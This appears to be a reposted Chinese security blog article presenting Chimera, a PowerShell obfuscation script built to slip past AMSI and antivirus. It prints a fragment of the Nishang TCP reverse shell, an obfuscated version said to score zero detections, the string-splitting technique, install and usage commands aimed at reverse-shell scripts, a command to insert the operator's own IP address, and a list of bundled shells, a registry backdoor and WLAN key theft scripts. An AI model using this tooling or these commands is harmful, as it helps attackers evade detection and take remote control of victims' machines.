Chimera 是一种 PowerShell 混淆脚本,旨在绕过 AMSI 和商业防病毒解决方案
2023-6-1 10:0:41 Author: Ots安全(查看原文) 阅读量:12 收藏

Chimera 是一个(闪亮且非常 hack-ish)的 PowerShell 混淆脚本,旨在绕过 AMSI 和防病毒解决方案。它消化已知会触发 AV 的恶意 PS1,并使用字符串替换和变量连接来逃避常见的检测签名。

Chimera 的工作原理...

下面是 Nishang 的Invoke-PowerShellTcp.ps1的片段,位于nishang/Shells。VirusTotal 报告了25 次PS1 脚本检测。

$stream = $client.GetStream()[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')$stream.Write($sendbytes,0,$sendbytes.Length)


在奇美拉之后又来了。VirusTotal 报告了0 次混淆版本检测。

  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.
# Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station. # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim. # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight. $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer. $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth) # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.


Chimera 做了几件事来混淆来源。该transformer函数将字符串分成多个部分并将它们重建为新变量。

例如,它会将一个字符串... New-Object System.Net.Sockets.TCPClient ...转换为:

$a = "Syste"$b = "m.Net.Soc"$c = "kets.TCP"$d = "Client"
... New-Object $a$b$c$d ...

该函数将通常标记的数据类型和字符串分成几个块。它定义了块并将它们连接在脚本的顶部。更高的值--level将导致更小的块和更多的变量。

$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

用法

克隆存储库。在 Kali v2020.3 中测试。

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils gitsudo git clone https://github.com/tokyoneon/chimera /opt/chimerasudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/sudo chmod +x chimera.sh; ./chimera.sh --help

基本用法。

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\invoke-expression,out-string,write-error -j -g -k -r -p

查看使用指南和文章以获取更多示例和屏幕截图。

shells

目录里shells/有几个霓裳脚本和几个通用脚本。所有都已经过测试,应该可以正常工作。但是没有人知道未经测试的脚本将如何用 Chimera 重现......

更改硬编码的 IP 地址。

sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1
ls -laR shells/
shells/:total 60-rwxrwx--- 1 tokyoneon tokyoneon 1727 Aug 29 22:02 generic1.ps1-rwxrwx--- 1 tokyoneon tokyoneon 1433 Aug 29 22:02 generic2.ps1-rwxrwx--- 1 tokyoneon tokyoneon 734 Aug 29 22:02 generic3.ps1-rwxrwx--- 1 tokyoneon tokyoneon 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1-rwxrwx--- 1 tokyoneon tokyoneon 281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1-rwxrwx--- 1 tokyoneon tokyoneon 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1-rwxrwx--- 1 tokyoneon tokyoneon 594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1-rwxrwx--- 1 tokyoneon tokyoneon 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1drwxrwx--- 1 tokyoneon tokyoneon 4096 Aug 28 23:27 misc-rwxrwx--- 1 tokyoneon tokyoneon 616 Aug 29 22:02 powershell_reverse_shell.ps1
shells/misc:total 36-rwxrwx--- 1 tokyoneon tokyoneon 1757 Aug 12 19:53 Add-RegBackdoor.ps1-rwxrwx--- 1 tokyoneon tokyoneon 3648 Aug 12 19:53 Get-Information.ps1-rwxrwx--- 1 tokyoneon tokyoneon 672 Aug 12 19:53 Get-WLAN-Keys.ps1-rwxrwx--- 1 tokyoneon tokyoneon 4430 Aug 28 23:31 Invoke-PortScan.ps1-rwxrwx--- 1 tokyoneon tokyoneon 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

项目地址:https://github.com/tokyoneon/Chimera

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247498304&idx=2&sn=95c68467f949eab1790853e3da1e1a34&chksm=9badb30bacda3a1d98a35379035b43890712b0469d215152a07b4a05538c75067b5cd2501784#rd
如有侵权请联系:admin#unsafe.sh